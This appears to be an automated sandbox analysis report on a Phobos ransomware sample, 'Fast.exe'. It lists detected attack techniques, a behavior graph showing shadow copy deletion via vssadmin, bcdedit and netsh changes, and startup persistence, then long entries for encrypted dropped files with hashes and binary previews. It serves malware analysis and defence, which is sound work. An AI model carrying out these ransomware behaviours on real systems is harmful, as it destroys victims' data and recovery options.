Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Hidden Files and Directories		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync23
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
File Deletion		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1388428 Sample: Fast.exe Startdate: 07/02/2024 Architecture: WINDOWS Score: 100 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 Multi AV Scanner detection for dropped file 2->64 66 7 other signatures 2->66 7 Fast.exe 1 501 2->7         started        11 Fast.exe 2->11         started        13 wbengine.exe 3 2->13         started        15 5 other processes 2->15 process3 file4 44 C:\ProgramData\Microsoft\Windows\...\Fast.exe, PE32 7->44 dropped 46 v8_context_snapsho...el61@gmx.com].eight, data 7->46 dropped 48 snapshot_blob.bin....el61@gmx.com].eight, data 7->48 dropped 50 38 other files (34 malicious) 7->50 dropped 68 Creates files in the recycle bin to hide itself 7->68 70 Drops PE files to the startup folder 7->70 72 Writes many files with high entropy 7->72 74 Infects executable files (exe, dll, sys, html) 7->74 17 cmd.exe 1 7->17         started        20 Fast.exe 2 6 7->20         started        23 cmd.exe 7->23         started        76 Multi AV Scanner detection for dropped file 11->76 78 Found evasive API chain (may stop execution after checking locale) 11->78 80 Creates files inside the volume driver (system volume information) 13->80 signatures5 process6 file7 52 May disable shadow drive data (uses vssadmin) 17->52 54 Deletes shadow drive data (may be related to ransomware) 17->54 56 Uses netsh to modify the Windows network and firewall settings 17->56 58 3 other signatures 17->58 25 vssadmin.exe 1 17->25         started        28 bcdedit.exe 9 1 17->28         started        30 bcdedit.exe 8 1 17->30         started        38 3 other processes 17->38 40 C:\Users\user\AppData\Roaming\...\Fast.exe, PE32 20->40 dropped 42 C:\Users\user\AppData\Local\Fast.exe, PE32 20->42 dropped 32 netsh.exe 2 23->32         started        34 netsh.exe 2 23->34         started        36 conhost.exe 23->36         started        signatures8 process9 signatures10 82 Deletes shadow drive data (may be related to ransomware) 25->82

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Fast.exe89%ReversingLabsWin32.Ransomware.Phobos
Fast.exe100%AviraTR/Crypt.XPACK.Gen
Fast.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Fast.exe89%ReversingLabsWin32.Ransomware.Phobos
C:\Users\user\AppData\Local\Fast.exe89%ReversingLabsWin32.Ransomware.Phobos
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe89%ReversingLabsWin32.Ransomware.Phobos

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.unicode.org/copyright.htmlicudtl.dat.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight.0.drfalse
    		high

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1388428
    Start date and time:2024-02-07 16:10:06 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 47s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:28
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Fast.exe
    Detection:MAL
    Classification:mal100.rans.spre.adwa.evad.winEXE@29/162@0/0
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 98%
    • Number of executed functions: 37
    • Number of non-executed functions: 113
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Override analysis time to 240s for sample files taking high CPU consumption

    Warnings

    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, VSSVC.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtCreateFile calls found.
    • Report size getting too big, too many NtOpenFile calls found.
    • Report size getting too big, too many NtQueryAttributesFile calls found.
    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
    • Report size getting too big, too many NtReadFile calls found.
    • Report size getting too big, too many NtSetInformationFile calls found.
    • Report size getting too big, too many NtWriteFile calls found.
    • VT rate limit hit for: Fast.exe

    Simulations

    Behavior and APIs

    TimeTypeDescription
    15:11:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fast C:\Users\user\AppData\Local\Fast.exe
    15:11:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fast C:\Users\user\AppData\Local\Fast.exe
    15:11:35AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Fast C:\Users\user\AppData\Local\Fast.exe
    15:11:45AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fast.exe
    16:11:29API Interceptor1x Sleep call for process: WMIC.exe modified
    16:11:35API Interceptor1815057x Sleep call for process: Fast.exe modified

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1000\desktop.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):386
    Entropy (8bit):7.236065806720983
    Encrypted:false
    SSDEEP:6:6q2clnjIgHPA9/unfaK6gziUpO4TdGljkl9eUHp2E8dTbw/8HBjeig34emu0+c:6qwgHPAczziUpxdGSlwSGbwaBm39Lc
    MD5:7446B8BE62D21CA5A23297901E2F163E
    SHA1:00269F66077C4F7A5CB17A46846257D3A81E76BB
    SHA-256:E50CA4F844E7923C8A45CC0523978857A2FB05F31C48511D41DE14CEF07A9732
    SHA-512:60164AB18BB6C7111F0CB7E9455BD1AD2426CE4183170632A5CAF41FBCA1C85DDBD63CC50D508DCBFBB8FB4FC4699D7EF3A1AD9DAECF5B3F63E7AA5C274EFC33
    Malicious:false
    Preview:..`.hW.!T ...;....O....S..J.\..~-....#.W....p.^.).9........Q.{..j....=....]..d7....6Z..v..LmPe.......iV.D.W.....)k..)s.q..oZ.Q.2)xi$=t..Ei\s ...x.Ad.L.)7.....+<.....k._......+...{..q...05.Q...........................|..4E.7.r..M....I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_

    C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1001\desktop.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):386
    Entropy (8bit):7.222050497046844
    Encrypted:false
    SSDEEP:6:ABjkYWNAmhouIHr1Y6zRpxEiW7giQam6PUsVgLuJDil72E8dTbw/8HBjeig34emx:nYIlyuK1Tf9EQ3BseSJel7GbwaBm39Lc
    MD5:E66302364FD06B631F4B7B41ADAEC56A
    SHA1:3C7B0CD5A03A6CC1E86C313379833D309B088EEF
    SHA-256:63BD3EB7AA99A9F077ADE732DBEE533A74B0E9857158F344C28DB30BF53F2A5A
    SHA-512:1B2616A9D361C119173713F69C3EA503C0DF6FAC43ABD52B1CE74F71D65FD6909AE0F712A9E87853F228127B005A2280F074C6B63C459582CF8A0D822400BF6D
    Malicious:true
    Preview:`x.cW..V..B.c.'..3...n..M..U.:.bZ..*...'..n........,K.,Fg..ey.U..#.a....G.X.h..&...;..k..pg.]......OS.........4..Qb..d:..Q..5JZ.C..].......rxCf...q.G..}6..6C.l....\..9q.g.+.e&.:B."q.0...i......2...........................*...}......I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_

    C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):386
    Entropy (8bit):7.202374888818583
    Encrypted:false
    SSDEEP:12:rdOT99jIeQZy3Tdd4RzJGalzGbwaBm39Lc:rsT99jD3THAGalbKYQ
    MD5:6BCF97572CE246BB4AB01AD4DB9EA734
    SHA1:39E76115C34E148ADD14E99BB97110EC7DD42A8F
    SHA-256:FD0A1BD08ADD6F0472F4D2F505243043E04B3DC0D08487424FC89184D8B9D060
    SHA-512:78808B9B8717AD415246CAF0E9EC63EFEC6DF9BEA10283C0343C1F7974FCFD215ECB1C80B5E9C55280F89D66494EE47C67E5566549BA9BDFE7E3A8B8AD152C09
    Malicious:false
    Preview:....N.*?.aT..g.J.`a3....Z.M.'^.........S4...V....3DX.F.y.Q. "..."..!e.2....eQQ.BF...~;...J...[......DdMF......J?...'.3.K..Z......M~3.+N..Y....z.e.v.....:D..\..tf.#.U.1..-.cj.{ 7..".SfqH..?.bd.1D...C\......................P..q....x...".....I(.....td.Lt........l.vY"V....#X/....S.WR:...8W2O.._...I-.`M."@.H.........5..[....c:8....t...\....<..&.......-...h....$........A_

    C:\Program Files\7-Zip\7-zip.chm.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):115554
    Entropy (8bit):7.998132950408453
    Encrypted:true
    SSDEEP:3072:BsQQq4KwcKC/qLxdfChramW4OK5Y8Z6HmhYgDL6tV/Q:dQlcTo7fChTD/bFhXqtV4
    MD5:9E9454033929CFB01F25303E6AC1A6D3
    SHA1:25767C861934BDAFB3398177DDEE4B54A093E2C3
    SHA-256:E88E85EFC1B50C97A42F7AC5D6A0A783DB30AF38EAFDDB4FDAC6AAE465343128
    SHA-512:5F9CDC31A1DDCE85E3F27DB25944CF692AC53709F53BD167C96038F975FA886D0E60404B729FC9563CCD682261CE4369127144C417F79A4247D963E00095B951
    Malicious:true
    Preview:.....47.&Mt..!j.p.d.1...3..[=.%0 ..!......w9)b..AB..[.`...^T..s.O.H.<.(+.]5.J...f.3[7~.....o;I..%O.L...x.......N..9D...P.._!....u.x......H....Xs.V.qk@..g{Aj...P.......o...G.{.rC........g..........F.o.Oz....>2..Y..4.]$.O.....}....|.u,.p.....3..m..I...m...".....JB...Rg....:..7....`2....bv...;Er.[~...G..R.....6wH..B .*.Z.[./...y~wk.&i%<...A.....K=v,.p._$l...q.f.......N.GQ].*b..D...?.l-........d..0..U...}..p.7g<~.{....K..$.'n.]...9..V..e.{.....2......7$h.5.04.2)....{BL..../....es =....q`.'....;......:.D...a.0...i-.....E;..C.x~.&..p..^..2=b...w.....eF.._nMl.&...Y.._.....Yh.a...@g.p...QH.....`..G.2k...O .....b...\....}m.t.L..A<..!:M.....D......,....a..........1P...>.-....$.......V2.R:\0.'...N.}F.D.=T>.....5~.F.U .+.. ...`.&....c".h7....F...*.~..y.<....j.c0z..,..R..sy..W.I}yu.s.....s...J......X..wg.}.bU...iY.=.#E.ns3.}r..{Lv....Fu...\Y$.%.._.q..l.6..{.9...7.....EL......y.F..SSF..r.g0....:M-P......g}.....l.V3<.UY.I+.....>K..j;Q..]P...<

    C:\Program Files\7-Zip\7-zip.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):101634
    Entropy (8bit):7.998309132926901
    Encrypted:true
    SSDEEP:3072:GxKJ6NdlphO9kjIdrIQgsmzPBDwozWmMRHrZ4WjR86OQ:6KETOacdBrc5wQZWiwXR
    MD5:62D988CF922BBBCB9F94F1B94AC4B97F
    SHA1:FB359E6C0A22A9DAE592738AA3F7E6AE47388AF8
    SHA-256:B004581D97197AA03059596B3437C5D069854D3F4A7ED2FF7BDAD9122A99B9F3
    SHA-512:9E66A74FC81211E3E343BC45E839750D68FAFFBD185557A07144C1B5140E979FB92A6F499E2BB01C1D2FB7CA287DCF6CB3494916AEE801A4EFF5DF5DCE22FA14
    Malicious:true
    Preview:........l..%...........u....;.,.E.W....'..g.....f.C.)5....h$..\j...m%t..(...T.......h....I.....Zy.M.......p....i.....\U.r.{v^...........%G*..i..K+<h...4.a21D...0.R...<.....u.K@.)?......[..Q...}..?5......n.......^f.v.X....._.m.&...*Z......e....q....-....f..}.>N...O2$dA.v...We...'...MG......[65.2<. A..?.J'RZ`....&..f-........0.+%..y3c...<..v.p7.>.S...[.i6.{.juW.d.!.n...Bw..Z'.......)vc.~{.G.....z...$.....A....@2.T....r:_.sU...b0...):.DR...}...x...>......QQPxU....8.G.1.x,......7Y..!6.t.j..$V......A%.Uo.......;.)..4......8L.C....3..9.$..p.jG.c.>~t*n..>.4..oZ.6...}b..E...E...j..X.....^..<Q.I...P...@..cL....l.4.2.....".O........f..&.~...'!.&...dm.sKc..q.J.=...k...GcU......Mh.3..^_;......;..Z.."...T....3E)\w.......eO.o@Q.bI.R.$..D,...$.R.......mT.k....v/.J....... S.`ZuG_j.u......n..j.z...':...I.....;$P.5.P..F..V...G...X.H..uPa|'.2.I).,...sWi..f.....'./"-..V.[w......... ......R.k..|<&...D %...`~...H..`.....m.Y-.....%....i..,..?S.t]H{y..

    C:\Program Files\7-Zip\7-zip32.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):66818
    Entropy (8bit):7.997054994728635
    Encrypted:true
    SSDEEP:1536:Tlb6ZQ3Ie7Wzyog+7Px781sznmMKFjH8KT4Q:TZfVCPxYsz1mH8u4Q
    MD5:50D256749EB1D1E044C4CE20D46B0B7E
    SHA1:C2DF7FB3A0813C64CE6F329683285F725FF65144
    SHA-256:870AB01ACB6B5871ECE30EFD9141B628839B9DA7586B898494EFD68AA7E0A051
    SHA-512:92746E17A68C31F451A2134A05E2CBB3988DC5CD4B71266912B32E5D28000DBE0E89AFA650A19974876134E9AB0208D02996ED580779FF06F9F8A28E9477DD8D
    Malicious:true
    Preview:s..g~.. ).....ME..y!.l.?."_{.9.FL.V.1..2..].3..`....A.FV......m.M.....p.O`.m.L..0....7<D.d.....J .H.>3.I..A.|B...y.&...c.....m...3....+S..r...Av!.y.......p+...$...s....+.../.g..R..%.....z`.n...M.]..u.M.a.`..`.....u...<.A...uo.fF#.....5.L....L..}.K...L[u....nHW.<"m.RSZ..p...K.....&....^..W.^...X2..>W.,UA*.....K.....o{.?...LC...UY.g_...U...tuf.i.-..MQ..H{..;hRoj.d.8._.#....+i ...EZ.].....#..j...p..W,.~%...}...]4*a.B5M.....\\.9.L3.u4..4...H ....b4H...g...h.c.~R...M...V..^V..Yz?]>.~..1t ,.Q>..m+.t.4.0...H.........fF^..X@...4.j......Q....#..<R..s......m..`kg......(...x.....!1.|y..o$...}!.6*.....>.z*.#U.E.o..m..3..b...;..5..s...u......u....&....%.R.^.wW.3Fjo...|..._j.<..:R...l....{p.2..]tWY1T..v.....;.......`J..@OWd.V..N.5.G.2.e...l{q......E.H........>.MR..>.B.g....`C...}..=. rPg....v.>ZEN/...'8.&w..o>.hc.x2K.R,RB.[...).Z.|.X....8...".^OXN:.....<...p.AE...t......PzB.:.lM......@VNVL..?O!.n..._.X.C.M;044.....6IGg...t!....~.4.,4....

    C:\Program Files\7-Zip\7z.dll.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):2628354
    Entropy (8bit):5.696693375531154
    Encrypted:false
    SSDEEP:24576:o4i55tbhriFWaWBvYyozGUjmwd1qCaqKnCXvXWr7shjT:o4iZNrqZyyjmwmCvKCXvi7sxT
    MD5:425004891A6B536BB2E2BC81A6FE5698
    SHA1:6ACE476A6CF81134F625F8E0B9C3EBA80ADE4334
    SHA-256:5738164900DDBFB7781B47450CF207AC0DCA7495867409AC80FA72BB093382AB
    SHA-512:87FC9F33615B11BC383E6AA99869D9D4144BCE97D6DB7413B322BC3DF9B23491D83F3DD0B6CB50059D30C5DA38B8B4FBEFABD8985C74DF925DD4C66EC8CE406E
    Malicious:false
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

    C:\Program Files\7-Zip\7z.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):557298
    Entropy (8bit):7.999738926702925
    Encrypted:true
    SSDEEP:6144:w7upzp0VNQ67u7MnnvtsF4GNB6y6uWszCLBYLiQ49xfWZQFP4U3j4k1+oiK/M24l:w7upL78vuVNB6uhGlcYuqFAqi+ujhqXw
    MD5:0668AD0027FD4301041F218469B984EF
    SHA1:BB65519B9B4EA1172FD001E86F602201B2093FA4
    SHA-256:5654FB5F1B1643E87F83E763A8F9B950CBCD23A4AF428E7E10E7833EAC42BFB5
    SHA-512:4D3F72C9C7D736EAF1B95B88C6B65F082214D436F08D8684BDD55B015B3B9586D671309172FCB448D92D15E530124AB899EBA66C0FF5FDEB45313979E270FEEB
    Malicious:true
    Preview:..2...yGFt.[...z.....Y..`......+2#......~..qo.x....Y{#N$......\.......!..Z.3...Xw|.]-Yz...x.F5@...su_j....SE..5.....VwiB..,.......}.|..u#.............p....D`_".U.kT..o.KX.].e....0..Z..x.....IC............d.U6...&_:q.....l...&.y]w..%H%!./a.....$....G.6]".k..=8N.....6.2...*N.._..h$7>....bws0..u....I..a...k..5.o......Sm...L.1..RNGy.3j.O.7.,B<.5.....(....;.br....p...{.....;b$y,6.\(....] ......|.&3...0...^$X.>...)OS...?......6.J.ilA..]E...$..Y{6.ZlC..7...M..9{..&...5k...>.g'WUwnJ...\..........._..rosz..?!.&.U=0C.....e..t...W.D...jaYQ?.)...p8.)..p...c.#.~.../..;.YT..|...w...hG..3^.UsM...l.M.......$Pr....+.@...u....(Q.$.z.......$v....~.07.HMtN..&....]V......r&=.5.....rl*.........w..G_.%.H.12.H..eO.....5.. D.[...9..B..5.-.Y..{......cf.Q++b0..N..}.W."*.|.JKj O.....]".I.....BM.K;.....e.R..UL^ JT..o..o..fY..........."..6#7...U@m....m"("p_.?.E...{...(.U...*.....>h.9.z.V.O.49....*..k.....SS...p..B..X.=..9..t...2@..%...;..&6m.&.}..#]..4.'y.+'......

    C:\Program Files\7-Zip\7z.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):214770
    Entropy (8bit):7.999179399201365
    Encrypted:true
    SSDEEP:3072:o4KhPAFPFpq4wThtLLUmQhDb239ZwhWUG/4GA8ZkFq22JjIfrkU0gemq72J4uwk2:BKJANq1LmMvDXBCD2J0IU01l7yKf
    MD5:50E99F917243C768A8D61CF118B4A5D6
    SHA1:7B724C48BB3677B6C3C0998F628992532ECB741A
    SHA-256:5886F24570234CC2C18FDD9B798F3C8AB7DFB88E72918CB395F0D787F18CD63E
    SHA-512:1CB9A2DA843F837F999C2130DADA3E513C913B6786CECA2E208B3256FE30B3DE952B16E305341F4ACD6781109D62C4A7B24CD9975630DDDDB51BAAAAD1CCC8F3
    Malicious:true
    Preview:..6..9...c....\f..(v..x..._k.....`.*........q....zDW2.q.3w..cc...M[...O.8.}.6..L.U.):..y.C......I..i8_E.~U...........e.==.n.......3N...@..^N.f.,....z..o..a.G..o.I.Ib"..0.V..C..........a5rX.....G.E...a...4.V.[..UB.`...(47.1..:.W6.......%.,.p.>..5.^..?.."6....s.....m....m....]...1...k%m1...rd%.>.uX....^2.d.....-3b..M0-.^..a.t.TZ............*.}.d$1....v.Z....i6....VV..M.A.p3..G..W...8 )...qP.....IP..5...g...7...e..0...|.F?.Q....TX...........1<."....~.'.-...'.=..3.0..e....K.H.Q....:....U...>4.@. {..g]..fP'..syM..~{.glx....UU..dM..I.j....U.."..k]5J......)_..&\.j.....G.V.v..7p...YZW...}...7`.[.i.|.D1.....I.dV-1_..u.=..i..p)G]Hhb.N...4...T.|..{.Dy].!.Z.........%b.............1.M..zW.$m..*..t.>..../Z:..ED..E...)6..=...8u5...G3.......9+<..j....0!....!..><M=.ZT.:......I>.+V...b.s..L....p.....%.{.....{g0S.cD.....C.%...O..~p.*.x...h..n6V.`._.....6X..!.|W.?7....jX.~.Af.!.7.....U.Y.?(?...}..?C\ ..._.`...G.gHl..qt.9..:!.#...7.}M..~..2...b..7kZ.[ox..c

    C:\Program Files\7-Zip\7zCon.sfx.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):193282
    Entropy (8bit):7.999137770282298
    Encrypted:true
    SSDEEP:3072:9OGk68zBkS9D8YzKNM4YkGo/wNGD+TN32myJ13IbjAPmpVqqujA++FApY4oUDvhK:9VS+G4BgNGyTNjAIbM0zD++AN9Dvf4Cg
    MD5:A9B51C4671DBEFFEDD4143E2F829C9EA
    SHA1:4F400064C7CCBC70C6204FC582372447C65A9558
    SHA-256:A24DB8BDDCF33626D5D6F253579DB49745B2E0B2364D33C89C455DCA66299A08
    SHA-512:F3947811FB38BC52A5C1D2F84D9DF4BAB14DCEDAD564820B678A2E430A500EC922741FDE938EFB7A82C43128294D8CFEBC29856BFED9468A73F42DDA54F8B9E6
    Malicious:true
    Preview:G....^..>s...2 @..V..@.z*I._..)...?)...I.S.....C....\.T.M.F....e!U=.j.Mo.".&V..1..JR...r.{..w..}.$..[.d/..=j..nW..:......k)k..F....S.;b.QG.S.UCB.T.jZ...'..8.....lg...B..%._...hbM?o.>.m...).%b...'..KB{...P..g-H.....6ef.\.o..a..X.....K....4#..R.M...XA.......\Z....e..2..&....K.WB......I......}R.J/DY-!...V..J9....l....H.&.O..X+...n.....1~...m.J..;7.@...._...h..^.&h.<.....6..z;..Wd".4...%tj_C.....K.7(2;3G..T2$......H.ta.@t.Qp:.../.>....v.=.2\D..g...6.F.?'.m..cl.......u^..S...CF...7.&.P.5.,..s......]..).L....eI...0....n.....Q6..d.8+t..Z..F.u...U@.t.{..x.f...A.Y..^.j)R.yk..p...u@....S^.}U.w........=.=...ayC...2.d....a...DN.T...G....\..F..M.$E/Gdi...GC....D..."..K.f....j..H2......1.....i........H.~._kf.t.1.II...~....q...2.8.CV..`A....z.t .'x..nr.....j.)....w.y......`.Yi&........c...7.R.O2....)....X)LK?.H..}N......9..J..k..0"Y..,|..^.A...aP/....J...-$.....+.+.r..HW...5*..G....S,..2.6.w..#|>d"x../CZ..W&......(kw...2.0..W.5h..C..*o..^.b..'^..

    C:\Program Files\7-Zip\7zFM.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):953090
    Entropy (8bit):7.9998265988627
    Encrypted:true
    SSDEEP:24576:jvL5MF7BUeKQQ8AsaKtBS7/U6iRIwf/B1M1wD6z:jvL2/U4nAhKBiiRbTM1wmz
    MD5:63F4DEE457F1050AC6975C9ECB15B786
    SHA1:2AE7BB1F3C17593187D4FE514C1E67170138CA7D
    SHA-256:DA3B1BD2B617E69FDC331D7A6F3E9AA05D051DC1FC521DD3F21C935126FC9E93
    SHA-512:8243E0C6D2B4754B2D756A557E912D4D31C0B11E4658CC7B2BA7C3074CD19243B4667AAAA14D2146EB6EF49FBF18C932B209B6C8A7D35CF6ECD1C1EB507E1B96
    Malicious:true
    Preview:.<j^...~.Z..}F.$..=I...a.c b..{.}.I..;p8.....N......v.S.....w.q..1....J...C. Y_..fe.)..3(.`(..u:..-.b......... .....e.%1........'.1..r.~..A{.I.{e..0.(....F../"..E.A...'..m..L.Y.Ay....v...0.D.>.t#V...w$;..KE...a.d..j..8.....u&.._. .*...{.BD.7hp.+(j.s.'......./...........?..h.5..>b..%......2.....G`8M..S.B+z..q\..ER..`.N.....(a.....T..1......S*.?N.<...Ja[...D..ll.N..v`G).....4....E.=...=Z....{...b.St.........|R...uH...6....C..g....A......P*....5.......A(Q.[..dP..f[O.S..|L....WM.....kb.M.......o..D..C.GN.7/@..M..) .C..[...6D.(...{..k..t.U.k.;..U....*U..e}...m./qj.A.~......[..M. .t.?\...,.o.....LR...mn...)..(?%6%oKb.~.5.&..d.Q.q.R...zv.... ...+k.....ZP.;. ..MM.{u._]1#Z../.BV...~....A#....M.......dDx.....Gru.X(.....,...v.f....8M,n.i...K_...W.M...oF....L.=..oZ.`4S<.$..XO.j.Q....U.....fN).F.v...p03rnf....7$U0Cv`<..y..ZY.v.B.|..j....6.w5...&.g.D.x...+.....FF.K9..\.qT(......!'.^.@.lWc..C....C...G!..j%.......UK........&.P........_.e|.5H..l......nO..Y.. ..

    C:\Program Files\7-Zip\7zG.exe.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):700658
    Entropy (8bit):7.999730752289234
    Encrypted:true
    SSDEEP:12288:fjNF2k/cgTkZv3kePeNiAXU3o1BpH9lCXww19c2WpHRPQFmGhoWRiyeN4:fT2k2ZvVPe8AXU2NGD6RRP+xhoOxea
    MD5:A27399EF090703AA38CE491858463A5B
    SHA1:D502BDA5EBF0601DAA812D8F64A8A3874EAFED2D
    SHA-256:DD1613E156EDB8461C0B97DB4CAFE750F415E648D6651FC06B108D98AF88A544
    SHA-512:BED1099058EED306F8563D6C963C034DF27F45B83C82EFA6AD76013B6ABC163F4C7590970DF30BBB1DDF7493F17AB5E3FDAB7DBCAA6B3CEC4D53B9DE966A5C2A
    Malicious:true
    Preview:}.(..;.o..dn..i.......Jx..#..o.11.v@w.5....M...'obE.L...!......a..-w.r...z.4.QjS....o.......q..Na..!....O.G.X..L.N..K..../...~zo'.b..YU<*../f@..c..."GfI.r.D.~..P........&$...-.>..D...$..0...I.c.?.u....dU..He.YB'.v.7.d.L..k.':Q.m.RU..F-:.<G...pm=....{.7.+.........$.+.4y....$C.TU`9o.T\.i..n|(..L.S.....YrI./M%.g..r..s..Tu..R.P.O..=.N.....e..%Z#0..!Cr.N>.C\.'....A.QK|v-..jj.Q....Lj..[.pT.j........A..... ..\G.{!.qY.M7N....s..J.)... X......;...sf...ze.........v#..L..)<d.......<z....l..V|J.w.l..ae@....tU...^.`........zG.e.'VH<.H.@..n..m.C.Q.C4>w......k.D.]....|.{%..M....=!.......m..s.......7+.S..(Q...y.uc\_.v.[a........4~..?.W.Z......V..-}Ebf...9..\A.1.@. t=....F..a..lR..d.....$..n.....;.d..d.+..{.1..c.T.D..Gu...~.fs.gMZ.K{....8.3...v.......7$...A&...r.I3..dZ.I.%/.....+1*.._..4...:..D.t.....C..`......*.NRIULeAC/e....,...ZO.4.^..-...h.....5.cD,..!.&g..|1C..._*s.Bi...up.9.".P.....d.9_D.&dG._).<....r.M.M..h.,..P.G4.,...?Z...7..B.YiS.w..q..O..".?

    C:\Program Files\7-Zip\History.txt.id[9AA40F17-2803].[HenryShrapnel61@gmx.com].eight

    Download File
    Process:C:\Users\user\Desktop\Fast.exe
    File Type:data
    Category:dropped
    Size (bytes):58562
    Entropy (8bit):7.996442765449261
    Encrypted:true
    SSDEEP:1536:/kvuPkvOoYPHAdtifk65f3poAbmhquKxZcPwIQ:vWgcq3WdhqjxiPrQ
    MD5:C5EBEC783F50707D192B2C7FE2AB9E2A
    SHA1:91EC1948133F4FB969651F182BCF65C776A06305
    SHA-256:220C95A89854A24A40BD9E569BECF42391DD9EB85E69835C03207FE2F17507C8
    SHA-512:F7F03E0156AD0C0D8DD98EF7C6385EF85CDDBDF878AF1D525EAD92DA18411A584296519394E083D06D716F7484618AB861CF1451D53EA9B1E03664D036789F0F
    Malicious:true
